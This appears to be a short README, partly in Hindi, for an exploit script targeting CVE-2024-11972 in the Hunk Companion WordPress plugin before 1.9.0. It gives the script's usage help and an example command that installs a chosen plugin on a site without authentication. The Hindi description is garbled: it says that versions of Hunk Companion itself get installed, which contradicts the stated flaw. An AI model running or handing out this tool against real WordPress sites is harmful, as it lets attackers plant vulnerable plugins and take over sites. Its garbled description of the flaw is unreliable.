
Hunk Companion < 1.9.0 - बिना प्रमाणीकरण के प्लगइन इंस्टॉलेशन
Hunk Companion < 1.9.0 - बिना प्रमाणीकरण के प्लगइन इंस्टॉलेशन
1.9.0 से पहले का Hunk Companion WordPress प्लगइन कुछ REST API एंडपॉइंट्स को सही ढंग से अधिकृत नहीं करता है, जिससे बिना प्रमाणीकरण के अनुरोध WordPress.org रिपॉजिटरी से 1.9.0 से पहले के किसी भी Hunk Companion WordPress प्लगइन को इंस्टॉल और सक्रिय कर सकते हैं, जिसमें बंद किए गए कमजोर 1.9.0 से पहले के Hunk Companion WordPress प्लगइन भी शामिल हैं।
usage: CVE-2024-11972.py [-h] -u URL [-p PLUGIN]
Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-p PLUGIN, --plugin PLUGIN
Plugin slug (default: Yoast SEO)
python CVE-2024-11972.py -u "http://example.com" -p "plugin-slug"